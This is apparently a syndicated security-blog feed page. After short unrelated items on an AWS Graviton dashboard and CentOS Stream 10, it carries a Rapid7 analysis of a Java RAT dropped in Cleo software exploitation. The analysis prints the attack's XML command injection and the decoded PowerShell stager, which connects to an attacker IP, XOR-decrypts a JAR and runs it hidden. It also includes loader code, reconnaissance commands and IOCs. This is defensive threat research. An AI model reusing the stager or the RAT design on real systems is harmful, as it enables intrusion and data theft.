As demonstrated by this use case, the Graviton Savings Dashboard enables various stakeholders in an organization to collaborate effectively, which leads to efficient outcomes and potential cost savings.

Conclusion

In summary, we showed how the Graviton Savings Dashboard provides clear insights into suitable workloads for Graviton migration, offers easy-to-understand visualizations for monitoring adoption, and automates resource matching and savings calculations. Streamlining the process of identifying and implementing cost-saving opportunities with Graviton-based instances means that the dashboard enables more informed decision-making about your AWS infrastructure. To learn more and get started with the Graviton Savings Dashboard, visit the Graviton Savings Dashboard page and take the first step toward more efficient and cost-effective cloud computing.

[$] A look at CentOS Stream 10

Post Syndicated from jzb original https://lwn.net/Articles/986792/

The Red Hat Enterprise Linux (RHEL) 10 beta was released in mid-November and, if all goes according to plan, CentOS Stream 10 should be released before the end of the year. While nothing is etched in stone just yet, it is a good time for anyone using or targeting RHEL (and its clones) to start taking a look at how Stream 10, and the corresponding EPEL repository, is shaping up. This is not only important to RHEL and Stream users, but anyone deploying and supporting software on enterprise Linux (EL) derivatives like AlmaLinux, Oracle Linux, and Rocky Linux as well.

Modular Java Backdoor Dropped in Cleo Exploitation Campaign

Post Syndicated from Christiaan Beek original https://blog.rapid7.com/2024/12/11/etr-modular-java-backdoor-dropped-in-cleo-exploitation-campaign/

Many thanks to Rapid7 MDR and incident response teams for their contributions to this analysis.

While investigating incidents related to Cleo software exploitation, Rapid7 Labs and MDR observed a novel, multi-stage attack that deploys an encoded Java Archive (JAR) payload. Our investigation revealed that the JAR file was part of a modular, Java-based Remote Access Trojan (RAT) system. This RAT facilitated system reconnaissance, file exfiltration, command execution, and encrypted communication with the attacker’s command-and-control (C2) server. Its modular architecture includes components for dynamic decryption, network management, and staged data transfer.

It’s worthwhile to note that this isn’t necessarily the only payload that has or will be deployed in attacks targeting Cleo software — it’s entirely possible an alternate payload could be leveraged. This underscores the importance of timely detection and response capabilities, as well as the critical role of monitoring assets that may be impacted by unknown zero-day threats.

At a high level, the attack flow can be visualized like so:

[Figure: high-level attack flow]

As Huntress pointed out in their blog on this threat campaign, part of the attack chain involves uploading and executing an XML file as part of a ZIP. We analyzed the XML file that contains the PowerShell code to understand how it would be triggered in line with the known CVE (CVE-2024-50623) and the new CVE (still pending) for the unauthenticated malicious hosts vulnerability in Cleo software.

The XML snippet appears to define a “Host” and “Mailbox” configuration in Cleo Integration Suite (e.g., Harmony, VLTrader, or LexiCom). Cleo software often uses XML-based configuration files for trading partner setups, hosts, mailboxes, and scheduled actions or commands. Each <Host> element represents a communication endpoint, and each <Mailbox> often represents a sub-endpoint or logical folder.

The <Action> elements define which tasks (commands, scripts, or transfers) should be performed. Looking at the code of our XML, we observed a suspicious element.

Under <Mailbox> there is an <Action> element with actiontype="Commands". Inside this action, there’s a <Commands> tag that runs:

SYSTEM cmd.exe /c "powershell -NonInteractive -EncodedCommand <base64_data>" > webserver/temp/webserver-<GUID>.swp

The <Commands> directive is invoking cmd.exe which runs PowerShell with an encoded command. The command is outputting to a .swp file, possibly to hide or store results locally.

Because this script is embedded within the <Action> element of the XML, the malicious code will run on the server if the Cleo system imports this configuration and executes the defined action as a result of exploiting the vulnerability described in CVE-2024-50623. This could completely compromise the system running Cleo, given that Cleo often runs with significant privileges and access to internal systems and file shares.

Analyzing the malicious PowerShell script content

The script in question was originally invoked as remote code execution (RCE) during suspected CVE-2024-50623 exploitation:

powershell -NonInteractive -EncodedCommand <base64_string>

This is a common technique used by attackers to obfuscate their malicious code. Decoding the Base64 string reveals a PowerShell snippet that:

  1. Establishes a TCP connection to a suspicious external host (185.181.230.103) on port 443. (See additional external host indicators in the IOCs section.)
  2. Retrieves and decrypts data from the remote server using a custom XOR-based routine.
  3. Writes the decrypted output as a JAR file named cleo.2853.
  4. Executes the malicious JAR using the embedded Java runtime of Cleo LexiCom (jre\bin\java.exe -jar cleo.2853).
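For responders who capture a similar command line, the decoding step mentioned above can be reproduced offline. PowerShell's -EncodedCommand argument is the Base64 encoding of the script's UTF-16LE bytes, so a minimal sketch looks like the following; the function name is hypothetical, and the sample value in the usage note is a harmless string rather than the payload from this campaign.

```python
import base64


def decode_encoded_command(encoded: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE text)."""
    return base64.b64decode(encoded).decode("utf-16-le")
```

For example, decode_encoded_command("ZABpAHIA") returns the string dir. Decoding only converts the argument back to text; it does not execute anything.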

Step-by-step analysis

  1. Network connection setup
    The script begins by creating a Net.Sockets.TcpClient object and connecting it to the remote server:

$c = New-Object Net.Sockets.TcpClient("185.181.230.103", 443)
$s = $c.GetStream()
$s.ReadTimeout = 10000
$w = New-Object System.IO.StreamWriter $s

A StreamWriter ($w) is then created so that the script can send initial data to the server. The malware sends a “TLS v3 <string>” message and processes the response, which serves as a form of handshake or protocol initialization.

2. XOR decryption setup
Before reading any payload from the server, the script sets up key variables for decrypting data:

$k = 112,171,142,211,15,25,18,201,93,185,21,234,208,30,189,187
$a = New-Object System.Byte[] 9999
$f = "cleo.2853"
$t = New-Object IO.FileStream($f, [IO.FileMode]::Create)
$n = $g = 0

  • $k is an array of 16 bytes used as part of the XOR encryption key.
  • $a is a large buffer (9999 bytes) to hold data read from the stream.
  • $f is the output file that will eventually contain the decrypted payload.
  • $t is a file stream for writing data to disk.

3. Reading and decrypting the payload
The script enters a loop, reading chunks of data and decrypting each byte with a custom XOR routine:

while(1){
    $r = $s.Read($a,0,9999)
    if($r -le 0){break}
    for($i=0;$i -lt $r;$i++){
        $j = $n++ -band 15
        $a[$i] = $a[$i] -bxor $k[$j] -bxor $g
        $g = ($g + $a[$i]) -band 255
        $k[$j] = ($k[$j] + 3) -band 255
    }
    $t.Write($a,0,$r)
}

This code does several things:

  • It continuously reads data from the remote server into $a.
  • For each byte, it calculates an index $j into $k (cycling through the key bytes).
  • It XORs the received byte with $k[$j] and a running state variable $g.
  • $g and $k[$j] evolve dynamically, meaning the key changes with every byte processed, making static detection harder.
  • Decrypted bytes are then written directly into the file cleo.2853.

The number behind the “cleo.*” differs in the cases we observed. By the end of this loop, the attacker’s encrypted payload is stored locally as a decrypted file.
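To decrypt a captured stream offline (for example, one carved from a packet capture), the loop above can be re-implemented for analysis. The sketch below mirrors the PowerShell logic as described; the class name RollingXorDecryptor is hypothetical, and the key is the $k array shown earlier. State is kept across calls because the original script carries $n, $g, and $k from one 9999-byte read to the next.

```python
KEY = [112, 171, 142, 211, 15, 25, 18, 201, 93, 185, 21, 234, 208, 30, 189, 187]


class RollingXorDecryptor:
    """Stateful re-implementation of the script's XOR routine, for analysis only."""

    def __init__(self, key=KEY):
        self.k = list(key)  # working copy of the key; it mutates per byte
        self.n = 0          # total bytes processed so far ($n)
        self.g = 0          # running sum of decrypted bytes, mod 256 ($g)

    def decrypt(self, chunk: bytes) -> bytes:
        out = bytearray(len(chunk))
        for i, cipher_byte in enumerate(chunk):
            j = self.n & 15                     # $j = $n++ -band 15
            self.n += 1
            plain = cipher_byte ^ self.k[j] ^ self.g
            out[i] = plain
            self.g = (self.g + plain) & 255     # state depends on the plaintext
            self.k[j] = (self.k[j] + 3) & 255   # key byte rotates after each use
        return bytes(out)
```

Feeding the stream in several chunks through one instance should give the same result as decrypting it in one call, which matches how the script processes successive reads.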

4. Final steps: Executing the malicious JAR
After fetching and decrypting the data, the script closes all streams and sets some environment variables:

$t.Close()
$w.Close()
$s.Close()

$env:QUERY="...185.181.230.103;135.237.120.41;"
$env:F=$f

The $env:QUERY variable appears to include additional IP addresses and contains the AES key used to decrypt the next stage and the string to send to the C2 server to receive the next payload. Finally, the script runs the malicious JAR file:

Start-Process -WindowStyle Hidden -FilePath jre\bin\java.exe -ArgumentList "-jar $f"

This leverages the Cleo environment’s embedded Java runtime. Since Cleo’s file transfer products come bundled with their own Java environment, the attackers don’t need to rely on a system-wide installation — they can simply run their malicious JAR directly. In one of our IR cases, the “cleo.xxxx” file was written to the C:\VLTrader\ directory.

Inside the JAR file
The core functionality revolves around a custom class loader named “start”.

[Figure: the custom class loader “start”]

Instead of loading classes from the file system, this loader accepts a byte array representing a compressed archive of class files. It then extracts each entry and stores them in a map, ready to be defined as Java classes on demand.

What does this custom class loader do?

  1. Extracts classes from a byte array: The constructor of the start class takes a byte array (like a JAR) and reads the class entries using a ZipInputStream. Each entry is unpacked and stored in a map keyed by the entry name. For example:

ZipInputStream zis = new ZipInputStream(new ByteArrayInputStream(byteArray));
ZipEntry entry;
while ((entry = zis.getNextEntry()) != null) {
    ByteArrayOutputStream bos = new ByteArrayOutputStream();
    int read;
    while ((read = zis.read(buffer)) > 0) {
        bos.write(buffer, 0, read);
    }
    cs.put(entry.getName(), bos.toByteArray());
}

Defining classes at runtime: Later, when a class is requested, the findClass method checks the map. If the class is found, it uses defineClass to load that class directly from the in-memory bytes:

if (cs.containsKey(className)) {
    byte[] classData = (byte[]) cs.get(className);
    return defineClass(className, classData, 0, classData.length);
}
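
When triaging a decrypted second-stage archive, it can help to list its entries the same way the loader does, without ever loading the classes. The following is a minimal Python sketch under that assumption; the function name is hypothetical. Unlike Java's ZipInputStream, which streams entries in order, Python's zipfile module reads the archive's central directory, so a malformed archive may behave differently between the two.

```python
import io
import zipfile


def unpack_archive(blob: bytes) -> dict:
    """Map each entry name in an in-memory ZIP/JAR to its raw bytes."""
    entries = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as archive:
        for info in archive.infolist():
            if not info.is_dir():
                entries[info.filename] = archive.read(info)
    return entries
```

The resulting dictionary plays the role of the cs map in the loader: entry names as keys and class bytes as values, ready for hashing or decompilation.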

2. Fetches and decrypts class data remotely. The main method doesn’t just run local code — it also does the following:

  • Reads configuration and keys from environment variables.
  • Connects to a remote host over port 443 and sends a “TLS v3” handshake-like message.
  • Receives encrypted data, which it then decrypts using AES keys derived from the environment-provided values.
  • Once decrypted, this data is treated like a JAR file, passed into a new start instance, and thus new classes are loaded at runtime.

3. Executes a specific class (Cli): With the new classes loaded, the code uses reflection to instantiate a particular class named “Cli” and invoke its constructor.

This mechanism allows the JAR to remain small and stealthy, as it doesn’t contain all its logic up front. Instead, it fetches critical code at runtime, decrypts it, and executes it dynamically. But it didn’t stop here — after executing this first JAR file, which acts as a loader, it downloads a zip file that contains multiple JAR files:

File name   MD5
Cli         fa0ffca3597af31fc196ca27283aa038
Dwn         510a7fa9d425f1c3a38ad81d813b3f17
DwnLevel    7dcaffc9c26fe9e08e9b66e05c644cfc
Mos         ee7acd7a8a5795308942f094c950de6f
Proc        37a761f4d02577cf6789676f87cb9fc6
ScSlot      6ff85e7bec211869073b969dbd10c8eb
SFile       ca3de6f055f94acc87c6d335d9cc5c04
Slot        d924ffd1f2952a03da29c0a7a33e6a54
SrvSlot     bcc1bf75e0be3efabbd616cc8cfa8c35

Overall this is how the modules work together and what their function is:

[Figure: overview of how the modules interact]

The Cli class appears to be a key component of a remote backdoor mechanism. On startup, it determines the operating system and sets flags accordingly before attempting to connect to a remote host over port 443 using Java’s non-blocking I/O. Once connected, it can manage data streams via asynchronous event loops, handle received data, and potentially issue commands. After initialization, the code instructs the system to delete its own initial file to remove evidence of its presence.

In Rapid7 MDR investigations into exploitation of Cleo software, we observed commands being executed that we would categorize as reconnaissance attempts.

The Dwn class appears to facilitate the packaging and transmission of files from the local system to a remote server. It assembles files (and directories) into a ZIP archive on the fly, splitting them into multiple ZIP chunks if they exceed a certain size threshold. Using a SrvSlot reference, it sends compressed file data over a network channel, carefully managing buffers and limiting throughput to avoid overwhelming the connection. The code iterates through directories, queues files, and processes them incrementally, updating statistics and retrying if conditions are not ideal. Through this mechanism, this class effectively automates and streamlines the mass transfer of local files, hinting at a data exfiltration or remote backup process. It’s designed to run quietly in the background, handle large file sets, and provide periodic progress updates to its server counterpart.

The DwnLevel class is a simple helper structure that represents a single level in a file traversal hierarchy. It holds an array of file objects, along with an index and a state variable to track the current processing position. As the Dwn class iterates through directories, the DwnLevel Java class instance keeps track of which files have been processed and which remain, helping the file packaging and transfer process proceed smoothly through potentially nested directories.

The Mos class acts as a custom output stream for sending ZIP data through Dwn. Instead of writing to disk, it buffers data in memory, attaches metadata like the job ID and packet offsets, and then hands the chunks off to Dwn to send out. This setup allows code that writes ZIP entries to operate as if it were writing to a normal output stream, while the Mos and Dwn classes handle the network transmission details behind the scenes.

Proc is a thread that runs external commands on the system, captures their output, and sends it back through SrvSlot. It can launch interactive shells, parse configuration files, and handle input given before the process starts.

The code of this class also shows that it is designed to be cross-platform, launching either a cmd (Windows) or a bash (*nix) shell:

[Figure: Proc class code selecting a cmd or bash shell]

ScSlot manages a network connection for a specific channel. It handles connecting, reading data, and relaying it to the SrvSlot class. If the connection fails or no data is received, it signals the server to close the channel. Its tick method processes incoming data in chunks to ensure smooth communication.

The SFile class handles file reading and writing operations. It can either read from an existing file or write to a new file, depending on the flags provided. The class tracks the file size and saved size, and handles errors by setting status messages.

The Slot class manages the network connection using the Java network IO class. It handles connecting, reading, and writing, ensuring a smooth data transfer.

Last but not least, since it is a core component of this Java RAT, is the SrvSlot class. It interacts with other classes as described before and is the central node for handling encrypted communications and data transfer — it handles the ZIP transfer traffic. Besides traffic handling, a small component in the code of this class appears to be for debugging purposes (i.e., providing diagnostics and session statistics).

Overall, this set of Java classes provides a modular, multi-stage system (Java RAT) that communicates with a C2 server, offers file-transfer and file-management functionality, executes commands, and applies packet-level encryption and decryption.

Indicators of compromise

Network IOCs:
67.199.229[.]140
76.9.210[.]45
89.248.172[.]139
131.226.235[.]203
176.123.10[.]115
185.162.128[.]133
185.163.204[.]137
185.181.230[.]103
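
To hunt for these indicators in connection or proxy logs, the defanged addresses first need to be converted back to plain IPv4 form. The following is a minimal sketch; the helper names and the sample log line in the usage note are hypothetical, and a real hunt would normally run in a SIEM or log platform rather than a script.

```python
import ipaddress
import re

DEFANGED_IOCS = """
67.199.229[.]140
76.9.210[.]45
89.248.172[.]139
131.226.235[.]203
176.123.10[.]115
185.162.128[.]133
185.163.204[.]137
185.181.230[.]103
"""

IPV4_PATTERN = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 1.2.3[.]4 back into 1.2.3.4."""
    return indicator.strip().replace("[.]", ".")


def load_iocs(text: str = DEFANGED_IOCS) -> set:
    """Parse the list above into a set of validated IPv4 strings."""
    iocs = set()
    for line in text.splitlines():
        if line.strip():
            iocs.add(str(ipaddress.ip_address(refang(line))))
    return iocs


def find_iocs(log_line: str, iocs: set) -> list:
    """Return the indicators that appear as whole IPv4 addresses in a log line."""
    return sorted(set(IPV4_PATTERN.findall(log_line)) & iocs)
```

Matching whole addresses rather than substrings avoids false hits such as 176.9.210.45 being mistaken for 76.9.210.45.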

Post-exploitation behavior

In multiple attack chains, after initial exploitation, the adversary executed the following enumeration commands via cmd to gather user, group and system information from the impacted system and display domain trust relationships.

systeminfo

net group /domain

whoami

wmic logicaldisk get name,size

nltest /domain_trusts
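
A cluster of these commands from a single parent process in a short window is usually more telling than any one of them alone. The sketch below shows one way to flag such a burst in process-creation logs; the function names and the threshold of three distinct commands are assumptions for illustration, not a Rapid7 detection rule.

```python
RECON_COMMANDS = (
    "systeminfo",
    "net group /domain",
    "whoami",
    "wmic logicaldisk get name,size",
    "nltest /domain_trusts",
)


def normalize(command_line: str) -> str:
    """Lowercase the command line and collapse runs of whitespace."""
    return " ".join(command_line.lower().split())


def recon_commands_seen(command_lines) -> set:
    """Return which of the listed enumeration commands appear in the input."""
    seen = set()
    for line in command_lines:
        normalized = normalize(line)
        for known in RECON_COMMANDS:
            if known in normalized:
                seen.add(known)
    return seen


def looks_like_recon_burst(command_lines, threshold: int = 3) -> bool:
    """Flag input containing at least `threshold` distinct enumeration commands."""
    return len(recon_commands_seen(command_lines)) >= threshold
```

In practice the input would be the command lines spawned by one parent process (for example, the Cleo service's Java process) within a few minutes.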

Rapid7 also observed post-exploitation activity in the form of an "OverPass-The-Hash" attack, in which the adversary leverages the NTLM hash of an account to obtain a Kerberos ticket that can be used to access additional network resources within the impacted environment.

MITRE ATT&CK Enterprise Techniques

Tactic             Technique
Initial access     Exploit Public-Facing Application (T1190)
Execution          Command and Scripting Interpreter (T1059)
Discovery          System Owner/User Discovery (T1033)
Discovery          System Information Discovery (T1082)
Discovery          Domain Trust Discovery (T1482)
Discovery          Permission Groups Discovery (T1069)
Lateral movement   Use Alternate Authentication Material: Pass the Hash (T1550.002)